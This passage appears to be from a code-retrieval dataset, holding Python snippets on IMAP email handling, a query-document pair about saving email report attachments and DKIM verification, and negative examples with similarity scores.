"def get_raw_list_mailboxes(self, directory: str= '\"\"') -> Union[List[bytes], None]:\n self._authenticated_or_die()\n # noinspection PyUnusedLocal\n status: str\n status, mailboxes = self._imap.list(directory)\n if 'OK' != status:\n return None\n return mailboxes",
"def get_remediation_targets(message_ids):\n\n from saq.email import get_email_archive_sections, search_archive\n\n if not message_ids:\n return []\n\n result = [] # of ( message-id, recipient )\n\n logging.info(\"searching for remediation targets for {} message-ids\".format(len(message_ids)))\n\n # first search email archives for all delivered emails that had this message-id\n for source in get_email_archive_sections():\n search_result = search_archive(source, message_ids, excluded_emails=saq.CONFIG['remediation']['excluded_emails'].split(','))\n for archive_id in search_result:\n result.append((search_result[archive_id].message_id, search_result[archive_id].recipient))\n #message_id = search_result[archive_id].message_id\n #recipient = search_result[archive_id].recipient\n #sender = result[archive_id].sender\n #subject = result[archive_id].subject\n #if message_id not in targets:\n #targets[message_id] = { \"recipients\": {}, \"sender\": sender, \"subject\": subject }\n #targets[message_id][\"recipients\"][recipient] = { \"removed\": 0, \"history\": [] }\n\n #with get_db_connection() as db:\n #c = db.cursor()\n\n # get remediation history of each target\n #c.execute(\"\"\"SELECT remediation.key, action, insert_date, username, result, successful, removed\n #FROM email_remediation\n #JOIN remediation ON email_remediation.key = remediation.key\n #JOIN users ON remediation.user_id = users.id\n #WHERE message_id IN ( {} )\n #ORDER BY insert_date ASC\"\"\".format(','.join(['%s' for _ in message_ids])), tuple(message_ids))\n #for row in c:\n #key, action, insert_date, user, result, successful, removed = row\n #message_id, recipient = key.split(':')\n #if recipient not in targets[message_id]['recipients']:\n ###targets[message_id]['recipients'][recipient] = { \"removed\": 0, \"history\": [] }\n #targets[message_id]['recipients'][recipient][\"removed\"] = removed targets[message_id]['recipients'][recipient][\"history\"].append({\"action\":action, \"insert_date\":insert_date, \"user\":user, \"result\":result, \"successful\":successful})\n#\n logging.info(\"found {} remediation targets for {} message-ids\".format(len(result), len(message_ids)))\n return result",
"def createWordList(emailids, emaildata): #creates word list of all the words used in email bodies\n with open('res/dictionary.txt', 'w') as f:\n words = set([])\n for emailid in emailids:\n email = e.Email(emailid)\n subject = set(email.parsedsubject)\n body = set(email.body)\n try:\n emailcontent = body.union(subject)\n for word in emailcontent:\n if not word in words:\n words.add(word)\n f.write(word + '\\n')\n except AttributeError:\n print(body)",
"def get_recipients(item_container):\n if item_container.item.string_1 != '':\n user_folder = get_item_container_by_path(item_container.item.string_1)\n return get_all_users_with_email(user_folder)\n else:\n while not check_userfolder(item_container):\n item_container = item_container.get_parent()\n return get_all_users_with_email(item_container)",
"def get_raw_emails_ids(self, *criteria, mailbox=None) -> Union[List[bytes], None]:\n self._authenticated_or_die()\n if mailbox is not None:\n self.select_mailbox(mailbox)\n if self._selected_mailbox is None:\n raise Exception('In order to get the list of emails in a mailbox, you must select a mailbox first!')\n criteria = ['ALL'] if 0 == len(criteria) else criteria\n # noinspection PyUnusedLocal\n status: str\n status, ids = self._imap.search(None, *criteria)\n if 'OK' != status:\n return None\n return ids",
"def check_for_subscribers(mail, login_info):\n ADDRESS, PASSWORD = login_info\n\n try:\n mail.select('inbox')\n data = mail.search(None, 'ALL') \n except:\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(ADDRESS, PASSWORD)\n mail.select('inbox')\n data = mail.search(None, 'ALL')\n \n mail_ids = data[1]\n id_list = mail_ids[0].split() \n\n if not id_list:\n return []\n\n first_email_id = int(id_list[0])\n latest_email_id = int(id_list[-1])\n\n subscribers = []\n\n for i in range(latest_email_id, first_email_id-1, -1):\n data = mail.fetch(str(i), '(RFC822)')\n for response_part in data:\n arr = response_part[0]\n if isinstance(arr, tuple):\n msg = email.message_from_string(str(arr[1],'utf-8'))\n email_from = msg['from']\n subscribers.append(email_from)\n\n return subscribers",
"def get_recipients(msg_parsed):\n recipients = []\n addr_fields = ['From', 'To', 'Cc', 'Bcc']\n\n for f in addr_fields:\n rfield = msg_parsed.get(f, \"\") # Empty string if field not present\n rlist = re.findall(ADDR_PATTERN, rfield)\n recipients.extend(rlist)\n\n return recipients",
"def get_body_infos():\n return [get_body_info(i) for i in get_body_ids()]",
"def load_received_messages(username):\n return [m for m in load_all_messages() if m[\"to\"] == username]",
"async def test_subjects_to_ignore_by_uuid(self):\n first_subject_uuid = first(first(self.reports[\"reports\"])[\"subjects\"].keys())\n self.set_source_parameter(\"subjects_to_ignore\", [first_subject_uuid])\n response = await self.collect(get_request_json_side_effect=[self.data_model, self.reports])\n self.assert_measurement(response, value=str(int(len(self.entities) / 2)), total=self.expected_software_metrics)",
"def send(self):\n msg_sent = []\n subs = mongo.db.subscribers\n bill_extractor = ExtractBills()\n \n # Do not need the object ID\n same_interval = subs.find({\"interval\":self.interval}, {'_id':0})\n \n for each in same_interval:\n email = each['email']\n tags = each['search_tags']\n state = each['state']\n chamber = each['chamber']\n print(email, tags)\n\n msg_for_rcpnt = bill_extractor.getBill(state, chamber, tags)\n #all_candidates.append((email, msg_for_rcpnt))\n \n #try:\n # msg_body = \"hello world\"\n # msg_body = render_template('mail_card.html')\n # msg = Message(msg_body,\n # sender=\"[email protected]\",\n # recipients=email)\n # mail.send(msg) \n # msg_sent.append((email, \"Success\"))\n #except Exception as e:\n # msg_sent.append((email, str(e)))\n #return msg_sent\n return msg_for_rcpnt",
"def getMessagesMatchingQuery(self, search_query_dict: Dict[str, str]) -> List[Dict[str, str]]:\n\n valid_operators = [\n 'from',\n 'to',\n 'subject',\n 'label',\n 'after',\n 'before',\n 'phrase',\n ]\n\n search_query = ''\n for operator in search_query_dict:\n if operator in valid_operators:\n search_query += '{query_type}:{query}'.format(\n query_type=operator, \n query=search_query_dict[operator]\n )\n search_query += ' '\n \n results = self.service.users().messages().list(userId='me', q=search_query).execute()\n messages_ids = results.get('messages', [])\n error = 'No messages found.'\n if not messages_ids:\n print(error)\n # return [error]\n \n return messages_ids",
"def filter_subjects(self):\n return self.filter_nodes('//Subjects/Subject')",
"def query_by_ids(self, ids=None, **kwargs):\n # kwargs['ids'] = ids.replace(' ', '')\n templates = []\n for k in ids:\n path = '/do/read/id/'+str(k)\n result = self._get(path=path, params=kwargs)\n template = result.get('emailTemplate')\n templates.append(template)\n return templates"
] |
[
"0.5849805",
"0.56086826",
"0.5588328",
"0.5531413",
"0.545257",
"0.5355394",
"0.53144324",
"0.52374667",
"0.519424",
"0.51788527",
"0.51319355",
"0.5126954",
"0.5124737",
"0.509778",
"0.50920707",
"0.50811964",
"0.50755876",
"0.50523406",
"0.50435853",
"0.50309765",
"0.5027881",
"0.50236756",
"0.5017437",
"0.501133",
"0.5008998",
"0.5006475",
"0.49655384",
"0.49482223",
"0.491787",
"0.48974323"
] |
0.6986212
|
0
|
Write the selected message part to a file in the temporary directory and return the filename
|
def write_part_to_file(self, uid, part):
    # Some parts carry no filename; fall back to a placeholder instead of crashing
    filename = part.get_filename() or "unnamed-part"
    filename = os.path.join(self.tmp_dir, os.path.basename(filename))
    try:
        # Use a context manager so the file handle is always closed
        with open(filename, 'wb') as fh:
            fh.write(part.get_payload(decode=True))
    except Exception as e:
        raise Exception(
            "Error writing to filename %s with exception %s" %
            (filename, str(e)))
    else:
        self.helper.log_debug(
            'write_part_to_file: saved file %s from uid %s' %
            (filename, uid))
        return filename
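
# Editor's sketch (assumption): how such a helper is typically driven -- decode a
# single MIME part and write it under a temporary directory.  `tmp_dir` is an
# assumed argument here; the original method takes it from self.tmp_dir.
import os

def write_attachment(tmp_dir, part):
    name = part.get_filename() or "unnamed-part"
    path = os.path.join(tmp_dir, os.path.basename(name))
    with open(path, "wb") as fh:
        fh.write(part.get_payload(decode=True) or b"")
    return path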
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def write(self, message):\r\n os.write(self.wfid, message.encode('utf-8'))",
"def write(message):\n\n with open(str(path), 'a') as fp:\n fp.write(message)",
"def reply_message(self, message):\n\n message = str(message).format(self.path).encode('utf-8')\n self.wfile.write(message)",
"def WriteToFile(msg, file_name):\r\n out_msg = str(msg)\r\n file = open(file_name, \"w\")\r\n file.write(str(decoded_msg))",
"def _writeOutput(self, msg, outputFile):\n f=self.openFile(outputFile, \"a\") #open otuputFile for appending\n f.write (msg)\n f.close()",
"def create_procesed_file(msg, filename, path):\n write_path_txt = os.path.join(path, filename)\n with open(write_path_txt, 'w') as file:\n file.write(str(msg))",
"def writeMessage(self,message):\n pass",
"def write_msg(file_path, msg):\n try:\n fd = open(file_path, 'a+')\n fd.write(msg)\n fd.close()\n except Exception, e:\n debug(e)",
"def write(self, cw, message):\n if cw in self.location:\n fn = self.location[str(cw)]\n try:\n swf = open(fn, \"w\")\n except Exception:\n logmsg.update(\"Error writing to file \" + fn + \"!\", 'E')\n else:\n swf.write(str(message))\n swf.close()\n else:\n logmsg.update(\"Wrong target [\" + str(cw) + \"] for saving file!\", 'E')",
"def _write_message(self, message):\n raw_data = message.serialize()\n debug(\"writing outgoing message of type \" + message.__class__.__name__)\n self.request.sendall(raw_data)",
"def write(self, fname):\n pass",
"def save_to_file(self, fp, sep='\\n'):\r\n n = 0\r\n m = self.read()\r\n while m:\r\n n += 1\r\n fp.write(m.get_body())\r\n if sep:\r\n fp.write(sep)\r\n self.delete_message(m)\r\n m = self.read()\r\n return n",
"def write (self, message, dest):\n raise NotImplementedError( 'Needs implementation' )",
"def printToFile(self, message=''):\n self._outputFile.write(str(message) + '\\n')",
"def write_msg(self, peer, timestamp, msg_type, msg):\n msg_path, msg_file = self.peer_files.get(peer.lower(), (None, None))\n if msg_path:\n msg_seq = self.msg_sequence[peer.lower()]\n\n msg_record = {\n 't': timestamp,\n 'seq': msg_seq,\n 'type': msg_type\n }\n msg_record.update(msg)\n try:\n json.dump(msg_record, msg_file)\n except Exception as e:\n LOG.error(e)\n LOG.info('raw message %s', msg)\n msg_file.write('\\n')\n self.msg_sequence[peer.lower()] += 1\n msg_file.flush()\n os.fsync(msg_file.fileno())",
"def write(self, filename):\n pass",
"def write(self, filename):\n pass",
"def write(self, out, message):\n if out != None:\n out.write(message)",
"def write(self, filename): # real signature unknown; restored from __doc__\n pass",
"def write(self, content):\n ...",
"def write(self, msg, *_):\n if self.out is not None:\n self.out.write(msg)\n self.out.flush()",
"def write_to(self, fp):\n fp.write(self.text)",
"def writeToText(self, textFilePath):\n\n\t\t# Create a text file for write only mode in the current directory\n\t\tfile = open(textFilePath,'w')\n\t\t# Write a message into file \n\t\tfile.write(self.message)\n\t\t# Close file\n\t\tfile.close()\n\t\t# Close the interface\n\t\tself.parent.destroy()",
"def write(self):\n with open(\"log.txt\", 'w') as f:\n for message in self.message_list:\n f.write(message + \"\\n\")",
"def write(self, out):",
"def write (self, file):\n\t\tfile.write (self.pack ())",
"def write_to_file(self, filename: str) -> None:",
"def save_message(self, user, message):\n full_message = '{0} {1} {2}'.format(str(datetime.now()), user, message)\n with open(self.path_to_message_file, 'a') as output:\n output.write(full_message + '\\n')",
"def save_file(self, filename):\r\n \r\n f = open(filename,'w')\r\n f.write(self.body)\r\n f.close",
"def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()"
] |
[
"0.69103193",
"0.6654209",
"0.6527428",
"0.6521442",
"0.65000355",
"0.64810604",
"0.6317068",
"0.6307852",
"0.62915653",
"0.6230662",
"0.62092286",
"0.6196441",
"0.61899656",
"0.61898386",
"0.61615443",
"0.609231",
"0.609231",
"0.60873765",
"0.6013084",
"0.5990759",
"0.5955906",
"0.5952981",
"0.59521526",
"0.59519124",
"0.58644193",
"0.58585024",
"0.58488035",
"0.58178455",
"0.57794017",
"0.57721716"
] |
0.67170376
|
1
|
Verify the DKIM signature(s) of a given RFC822 message. Currently this only generates debug logging.
|
def dkim_verify(self, msg, uid):
try:
obj = dkim.DKIM(msg)
except Exception as e:
self.helper.log_info(
'dkim_verify: exception verifying msg uid %s with %s' %
(uid, str(e)))
else:
sigheaders = [
(x, y) for x, y in obj.headers if x.lower() == b"dkim-signature"]
self.helper.log_debug(
'dkim_verify: msg uid %s has %d DKIM signatures' %
(uid, len(sigheaders)))
for i in range(0, len(sigheaders)):
try:
res = obj.verify(i)
except Exception as e:
self.helper.log_info(
'dkim_verify: exception verifying msg uid %s with %s' %
(uid, str(e)))
else:
if res:
self.helper.log_debug(
'dkim_verify: msg uid %s signature %d ok from domain %s selector %s' %
(uid, i, obj.domain, obj.selector))
else:
self.helper.log_debug(
'dkim_verify: msg uid %s signature %d fail from domain %s selector %s' %
(uid, i, obj.domain, obj.selector))
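
# Editor's sketch (assumption): outside this class the dkimpy package offers a
# simpler module-level check that validates the first DKIM-Signature header.
import dkim

def has_valid_dkim(raw_message: bytes) -> bool:
    try:
        return bool(dkim.verify(raw_message))
    except Exception:   # treat dkim.DKIMException / DNS failures as "not valid"
        return False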
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def sign_and_verify(self, msg):\n ciphertext, tag = self.signer.encrypt_and_digest(msg.encode('utf-8'))\n plaintext = self.verifier.decrypt(ciphertext)\n try:\n self.verifier.verify(tag)\n print(\"The message is authentic: \", plaintext)\n except ValueError:\n print(\"Key incorrect or message corrupted\")",
"def verify_request_signature(req_info: StatusResponse) -> None:\n if not req_info.signature_check(req_info.xmlstr):\n raise ValueError(_(\"Message signature verification failure\"))",
"def test_signature_verification(self):\n curdir = os.path.dirname(os.path.abspath(__file__))\n keydir = os.path.join(curdir, \"data\", \"ima_keys\")\n\n lines = SIGNATURES.split('\\n')\n\n # empty keyring\n keyring = ima_file_signatures.ImaKeyring()\n self.assertTrue(ima.process_measurement_list(lines, ima_keyring=keyring) is None)\n\n # add key for 1st entry; 1st entry must be verifiable\n rsakeyfile = os.path.join(keydir, \"rsa2048pub.pem\")\n pubkey, keyidv2 = ima_file_signatures.get_pubkey_from_file(rsakeyfile)\n keyring.add_pubkey(pubkey, keyidv2)\n self.assertTrue(ima.process_measurement_list(lines[0:1], ima_keyring=keyring) is not None)\n self.assertTrue(ima.process_measurement_list(lines[1:2], ima_keyring=keyring) is None)\n\n # add key for 2nd entry; 1st & 2nd entries must be verifiable\n eckeyfile = os.path.join(keydir, \"secp256k1.pem\")\n pubkey, keyidv2 = ima_file_signatures.get_pubkey_from_file(eckeyfile)\n keyring.add_pubkey(pubkey, keyidv2)\n self.assertTrue(ima.process_measurement_list(lines[0:2], ima_keyring=keyring) is not None)",
"def verify(self):\n token = \"mytoken\" # set from wx server\n ll = []\n signature = self.get_argument(\"signature\", \"<none>\")\n ll.append(self.get_argument(\"timestamp\", \"<none>\"))\n ll.append(self.get_argument(\"nonce\", \"<none>\"))\n ll.append(token)\n ll.sort()\n m = hashlib.sha1()\n m.update(\"\".join(ll).encode(\"ascii\"))\n digest = m.hexdigest()\n\n if signature != digest:\n print(\"signature not match, discard this msg!\")\n return False\n else:\n print(\"signature match, got a wechat msg!\")\n return True",
"def verify(public_key, message, signature):\n hasher = SHA256.new(message)\n verifier = PKCS1_v1_5.new(public_key)\n return verifier.verify(hasher, signature)",
"def verify(signature: Signature, pub_key: rsa.RSAPublicKey, msg: bytes) -> bool:\n try:\n pub_key.verify(signature, msg, PADDING, HASH)\n except:\n return False\n return True",
"def verify_signature(message: bytes, sender_public_key: RsaKey) -> bytes:\n signature = message[:sender_public_key.size_in_bytes()] # Assume encryption has been done with same key size\n original_message = message[sender_public_key.size_in_bytes():]\n h = SHA256.new(original_message)\n verifier = pkcs1_15.new(sender_public_key)\n try:\n verifier.verify(h, signature)\n return original_message\n except ValueError:\n raise SignatureNotAuthentic",
"def verify_signature(self, message, signature):\n if self.negotiate_flags & \\\n NegotiateFlags.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:\n actual_checksum = signature[4:12]\n actual_seq_num = struct.unpack(\"<I\", signature[12:16])[0]\n else:\n actual_checksum = signature[8:12]\n actual_seq_num = struct.unpack(\"<I\", signature[12:16])[0]\n\n expected_signature = calc_signature(message, self.negotiate_flags,\n self.incoming_signing_key,\n self.incoming_seq_num,\n self.incoming_handle)\n expected_checksum = expected_signature.checksum\n expected_seq_num = struct.unpack(\"<I\", expected_signature.seq_num)[0]\n\n if actual_checksum != expected_checksum:\n raise Exception(\"The signature checksum does not match, message \"\n \"has been altered\")\n\n if actual_seq_num != expected_seq_num:\n raise Exception(\"The signature sequence number does not match up, \"\n \"message not received in the correct sequence\")\n\n self.incoming_seq_num += 1",
"def verifymessage(self, address, signature, message):\n return self.proxy.verifymessage(address, signature, message)",
"def verify(self, sig, fingerprint):\n\n if type(sig) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n if type(fingerprint) != type('') or len(fingerprint) != 40:\n raise ValueError(\"invalid fingerprint!\")\n\n\n try:\n self.gpg.recv_keys(MIT_KEY_SERVER, fingerprint)\n\n except:\n raise ValueError(\"error when receiving fingerprint {}\".format(fingerprint))\n\n return self.gpg.verify(sig).valid",
"def verifymessage(self, vergeaddress, signature, message):\n return self.proxy.verifymessage(vergeaddress, signature, message)",
"def verify(self, signature, body, external_aad, public_key):",
"def Verify(self, msg, sig):\n try:\n (r, s) = util.ParseDsaSig(sig)\n return self.key.verify(util.Hash(msg), (r, s))\n except errors.KeyczarError:\n # if signature is not in correct format\n return False",
"def verify_rsa(sig_hex, message, public_key):\n sig_int = int(sig_hex , 16)\n m_int = pow(sig_int, public_key.e, public_key.n)\n m_hex = \"%0512x\" % m_int\n h = SHA.new(message).hexdigest()\n return re.match('0001f*' + ASN1_MAGIC + h, m_hex) is not None",
"def salt_sign_and_verify(self, msg, salt):\n ciphertext, tag = self.signer.encrypt_and_digest((msg+salt).encode('utf-8'))\n plaintext = self.verifier.decrypt(ciphertext).replace(salt.encode(), \"\".encode())\n try:\n self.verifier.verify(tag)\n print(\"The message is authentic: \", plaintext)\n except ValueError:\n print(\"Key incorrect or message corrupted\")",
"async def verify_signature(self, message: BasePendingMessage) -> bool:\n\n if message.signature is None:\n LOGGER.warning(\"'%s': missing signature.\", message.item_hash)\n return False\n\n try:\n signature = json.loads(message.signature)\n sigdata = base58.b58decode(signature[\"signature\"])\n public_key = base58.b58decode(signature[\"publicKey\"])\n except ValueError:\n LOGGER.warning(\"Solana signature deserialization error\")\n return False\n\n if signature.get(\"version\", 1) != 1:\n LOGGER.warning(\n \"Unsupported signature version %s\" % signature.get(\"version\")\n )\n return False\n\n if message.sender != signature[\"publicKey\"]:\n LOGGER.warning(\"Solana signature source error\")\n return False\n\n try:\n verify_key = VerifyKey(public_key)\n verification_buffer = get_verification_buffer(message)\n verif = verify_key.verify(verification_buffer, signature=sigdata)\n result = verif == verification_buffer\n except BadSignatureError:\n result = False\n except Exception:\n LOGGER.exception(\"Solana Signature verification error\")\n result = False\n\n return result",
"def notify(plaintext_message, signature):",
"def integrity_digsig_verify(self, signature: bytes, filehash: bytes, filehash_type: str) -> bool:\n fmt = \">BB\"\n if len(signature) < struct.calcsize(fmt):\n logger.warning(\"Malformed signature: not enough bytes\")\n return False\n\n typ, version = struct.unpack(fmt, signature[: struct.calcsize(fmt)])\n if typ not in [EvmImaXattrType.EVM_IMA_XATTR_DIGSIG, EvmImaXattrType.EVM_XATTR_PORTABLE_DIGSIG]:\n logger.warning(\"Malformed signature: wrong type\")\n return False\n\n if version == 2:\n return self._asymmetric_verify(signature, filehash, filehash_type)\n\n logger.warning(\"Malformed signature: wrong version (%d)\", version)\n return False",
"def Verify(self, msg, sig):\n try:\n (r, s) = util.ParseDsaSig(sig)\n return self.key.verify(util.Hash(msg), (r, s))\n except errors.KeyczarError:\n # if signature is not in correct format\n return False",
"def verify(self, assoc_handle, message):\n assoc = self.getAssociation(assoc_handle, dumb=True)\n if not assoc:\n logger.error(\"failed to get assoc with handle %r to verify \"\n \"message %r\" % (assoc_handle, message))\n return False\n\n try:\n valid = assoc.checkMessageSignature(message)\n except ValueError as ex:\n logger.exception(\"Error in verifying %s with %s: %s\" %\n (message, assoc, ex))\n return False\n return valid",
"def validate_signature_using_user_id(message, signature=None):\n if signature is None:\n signature = message.pop('signature')\n\n signature = (int(base64.b64decode(signature).decode()),)\n\n user_id = message['user_id']\n\n message = json.dumps(message)\n public_key_path = os.path.join('public_keys', f'public.{user_id}.key')\n with open(public_key_path, 'rb') as file:\n public_key = RSA.importKey(file.read())\n\n h = SHA.new(message.encode()).digest()\n\n return public_key.verify(h, signature)",
"def validate_signature(message):\n user_validation = UserValidation.validate_user(message['user_id'])\n if user_validation:\n return DataShare.validate_signature_from_message(message, public_key=user_validation), user_validation\n return False, None",
"def verify_signature(self, key, data):\n verify_signature(self, key, data)",
"def Verify(self, signed_bytes, signature_b64):\r\n # Generate the PKCS1-v1_5 compatible message, which includes\r\n # magic ASN.1 bytes and padding:\r\n emsa_msg = self._MakeEmsaMessageSha256(signed_bytes,\r\n self.keypair.size())\r\n\r\n # Get putative signature:\r\n putative_signature = base64.urlsafe_b64decode(signature_b64.encode('utf-8'))\r\n putative_signature = number.bytes_to_long(putative_signature)\r\n\r\n # Verify signature given public key:\r\n return self.keypair.verify(emsa_msg, (putative_signature,))",
"def verify_signature(self):\n if self.get_contact_key:\n sender_key = self.get_contact_key(self.sender_handle)\n else:\n sender_key = fetch_public_key(self.sender_handle)\n if not sender_key:\n raise NoSenderKeyFoundError(\"Could not find a sender contact to retrieve key\")\n MagicEnvelope(doc=self.doc, public_key=sender_key, verify=True)",
"def test_signature_validation(self):\n signature = app.utils.generate_signed_data(\n self._body,\n settings.PRIVATE_KEY\n )\n\n self.assertTrue(app.utils.validate_signed_data(\n self._body,\n signature,\n settings.PUBLIC_KEY\n ))",
"def verifySignature(self, message: bytes, signature: bytes, sigAlgo: SignatureAlgorithm) -> bool:\n\n # Convert parent type algos.SignedDigestAlgorithm to SignatureAlgorithm\n if not isinstance(sigAlgo, SignatureAlgorithm):\n sigAlgo.__class__ = SignatureAlgorithm\n\n # Convert plain ECDSA sig to x9.62 format\n if sigAlgo.isPlain:\n signature = ECDSA_X962_Signature.fromPlain(signature).dump()\n\n hash_algo = algo_utils.get_hash_algo_by_name(sigAlgo.hashAlgo)\n\n class Verifier:\n def __init__(self, vf):\n self._vf = vf\n def verify(self):\n return self._vf()\n\n def get_rsa_verifier(pub_key: rsa.RSAPublicKey):\n if sigAlgo.signature_algo == 'rsassa_pss':\n sig_algo_params = sigAlgo['parameters']\n assert 'mask_gen_algorithm' in sig_algo_params\n assert 'salt_length' in sig_algo_params\n\n mgf = sig_algo_params['mask_gen_algorithm']['algorithm'].native\n if 'mgf1' != mgf:\n raise ValueError(\"Invalid mask generation algorithm: {}\".format(mgf))\n\n mgf1_hash_algo = sig_algo_params['mask_gen_algorithm']['parameters']['algorithm'].native\n mgf1_hash_algo = algo_utils.get_hash_algo_by_name(mgf1_hash_algo)\n return Verifier(lambda:\n pub_key.verify(\n signature,\n message,\n padding.PSS(\n mgf = padding.MGF1(mgf1_hash_algo),\n salt_length = sig_algo_params['salt_length'].native\n ),\n hash_algo\n ))\n else:\n return Verifier(lambda:\n pub_key.verify(signature, message, padding.PKCS1v15(), hash_algo)\n )\n\n def get_ecdsa_verifier(pub_key: ecc.EllipticCurvePublicKey):\n return Verifier(lambda:\n pub_key.verify(signature, message, ecc.ECDSA(hash_algo))\n )\n\n def get_eddsa_verifier(pub_key: ed25519.Ed25519PublicKey):\n return Verifier(lambda:\n pub_key.verify(signature, message)\n )\n\n def get_dsa_verifier(pub_key: ecc.EllipticCurvePublicKey):\n return Verifier(lambda:\n pub_key.verify(signature, message, hash_algo)\n )\n\n # Get signature verifier\n if self.isRsaKey():\n verifier = get_rsa_verifier(self._pub_key)\n elif self.isEcKey():\n verifier = get_ecdsa_verifier(self._pub_key)\n elif self.isEdKey():\n verifier = get_eddsa_verifier(self._pub_key)\n else:\n verifier = get_dsa_verifier(self._pub_key)\n\n # Verify sig\n try:\n verifier.verify()\n except cryptography_exceptions.InvalidSignature:\n return False\n return True",
"def checkvalid(s: bytes, m: bytes, pk: bytes) -> None:\n if len(s) != b // 4:\n raise ValueError(\"signature length is wrong\")\n\n if len(pk) != b // 8:\n raise ValueError(\"public-key length is wrong\")\n\n R = decodepoint(s[: b // 8])\n A = decodepoint(pk)\n S = decodeint(s[b // 8 : b // 4])\n h = Hint(encodepoint(R) + pk + m)\n\n (x1, y1, z1, _) = P = scalarmult_B(S)\n (x2, y2, z2, _) = Q = edwards_add(R, scalarmult(A, h))\n\n if (\n not isoncurve(P)\n or not isoncurve(Q)\n or (x1 * z2 - x2 * z1) % q != 0\n or (y1 * z2 - y2 * z1) % q != 0\n ):\n raise SignatureMismatch(\"signature does not pass verification\")",
"async def verify(self, data, signature):\n\t\tsignature_struct = NTLMSSP_MESSAGE_SIGNATURE.from_bytes(signature)\n\t\tcalc_sig = self.MAC(self.crypthandle_server.encrypt, self.SignKey_server, signature_struct.SeqNum, data)\n\t\t#print('server signature : %s' % signature)\n\t\t#print('calculates signature: %s' % calc_sig)\n\t\treturn signature == calc_sig",
"def verify(self, message, sig):\n\n assert len(message) == 32\n lr, r, ls, s = unpack(\"H32sH32s\", sig)\n sig = Bn.from_binary(r[:lr]), Bn.from_binary(s[:ls])\n return do_ecdsa_verify(self.G, self.pub, sig, message)"
] |
[
"0.6467025",
"0.6031846",
"0.5953838",
"0.5880111",
"0.5860588",
"0.58585465",
"0.5795354",
"0.5677047",
"0.56419563",
"0.5637088",
"0.56293523",
"0.56088346",
"0.5595094",
"0.5575109",
"0.5573037",
"0.55443174",
"0.553801",
"0.55234855",
"0.54802734",
"0.54794645",
"0.5449481",
"0.5429016",
"0.54181343",
"0.5417434",
"0.54164064",
"0.5412086",
"0.54018694",
"0.5390317",
"0.53681004",
"0.5356571"
] |
0.73208284
|
0
|
Find XML, zip and gzip attachments in the response and write them to disk. Return a list of the filenames that were written.
|
def save_reports_from_message_bodies(self, response):
filelist = []
for uid, data in list(response.items()):
if self.opt_validate_dkim:
self.dkim_verify(data.get(b'RFC822',''), uid)
msg = email.message_from_string(data.get(b'RFC822',''))
if msg.is_multipart():
self.helper.log_debug(
'save_reports_from_message_bodies: start multipart processing of msg uid %s' %
uid)
for part in msg.get_payload():
ctype = part.get_content_type()
if self.check_eligible_mimetype(ctype, uid):
filename = self.write_part_to_file(uid, part)
filelist.append(filename)
else:
self.helper.log_debug(
'save_reports_from_message_bodies: start non-multipart processing of msg uid %s' %
uid)
ctype = msg.get_content_type()
if self.check_eligible_mimetype(ctype, uid):
filename = self.write_part_to_file(uid, msg)
filelist.append(filename)
else:
self.helper.log_debug(
'save_reports_from_message_bodies: skipping content-type %s of msg uid %s' %
(ctype, uid))
# mark msg as seen in KVstore
self.save_check_point(uid.split()[1], msg)
return filelist
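
# Editor's sketch (assumption): the MIME types a DMARC collector usually treats as
# eligible report attachments; the real add-on decides in check_eligible_mimetype,
# whose exact policy is not shown here.
import email

ELIGIBLE_CTYPES = {
    "application/zip",
    "application/gzip",
    "application/x-gzip",
    "application/xml",
    "text/xml",
}

def eligible_parts(raw_message: str):
    msg = email.message_from_string(raw_message)
    parts = msg.get_payload() if msg.is_multipart() else [msg]
    return [p for p in parts if p.get_content_type() in ELIGIBLE_CTYPES]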
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __get_files(self):\r\n \r\n files = []\r\n with requests.Session() as s:\r\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}\r\n respons = s.get(self.__url, headers=headers).text\r\n soup = BeautifulSoup(respons, 'html.parser')\r\n data_files = [link.get('href') for link in soup.find_all('a', class_=\"btn-primary\")]\r\n for year in soup.find_all('td', class_=\"align-middle\"):\r\n regex = re.compile(r\"data/data-?gis({year}|\\-rok\\-{year})\\.zip\".format(year=year.text))\r\n if any((match := regex.match(link)) for link in data_files):\r\n files.append(match.group(0))\r\n else:\r\n files.append(data_files[-1])\r\n return files",
"def get_files_to_download(self):\n\n self.logger.logMsg(\"Getting Files to Download\")\n\n download_links = []\n try:\n with open(self.main_xml) as xml_file:\n data_dict = xmltodict.parse(xml_file.read())\n\n xml_file.close()\n\n for docs in data_dict.get('response').get('result').get('doc'):\n for doc in docs.get('str'):\n\n if doc.get('@name') == 'download_link':\n link = doc.get('#text', None)\n if link is not None:\n download_links.append(link)\n except Exception as e:\n self.logger.logMsg(\"Error Getting Files to Download {}\".format(str(e)))\n raise Exception('Error in Getting Files For Download')\n\n self.logger.logMsg(\"Finished Getting Files to Download\")\n\n return download_links",
"def extract_files(self) -> list:\n pass",
"def GetPayloadFiles(self, payloads_name):\n files = set()\n payloads = self.GetPayloadsDict(payloads_name)\n for type_name, payload_dict in payloads.items():\n for part, res_name in payload_dict.items():\n if part == 'file' or re.match(r'part\\d+$', part) or part == 'crx_cache':\n files.add((type_name, part, res_name))\n return files",
"def download_files(self):",
"def files(self):\r\n url = '{0}/files'.format(self.get_url())\r\n\r\n return http.Request('GET', url), parsers.parse_json",
